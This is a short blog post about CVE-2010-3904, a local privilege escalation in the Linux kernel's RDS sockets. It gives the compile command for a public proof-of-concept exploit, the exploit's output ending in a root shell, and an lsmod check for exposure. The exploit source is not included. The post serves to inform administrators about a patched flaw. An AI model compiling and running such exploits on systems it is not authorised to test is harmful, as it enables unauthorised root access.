Recently it was reported by VSR Security that Linux Kernel versions 2.6.30+ are affected by an exploit due to the implementation of RDS (Reliable Datagram Sockets).
Linus Torvalds has committed a patch upstream to close the exploit. VSR Security has released a proof-of-concept exploit, to show the severity of the exploit.
You can compile the exploit using:
gcc linux-rds-exploit.c -o CVE-2010-3904-exploit
Upon running the binary on an affected machine, you’ll get:
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xf7f577b0
[+] Resolved rds_ioctl to 0xf7f52000
[+] Resolved commit_creds to 0xc04596eb
[+] Resolved prepare_kernel_cred to 0xc04595e9
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
sh-4.1#
For your machine to be affected you need to have to be loaded. Which can be checked with:
lsmod | grep rds
Which would return:
sh-4.1# lsmod | grep rds
rds 52948 4
If your machine is not affect the run of the above binary would result in a message like so:
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Could not open socket.
No comments:
Post a Comment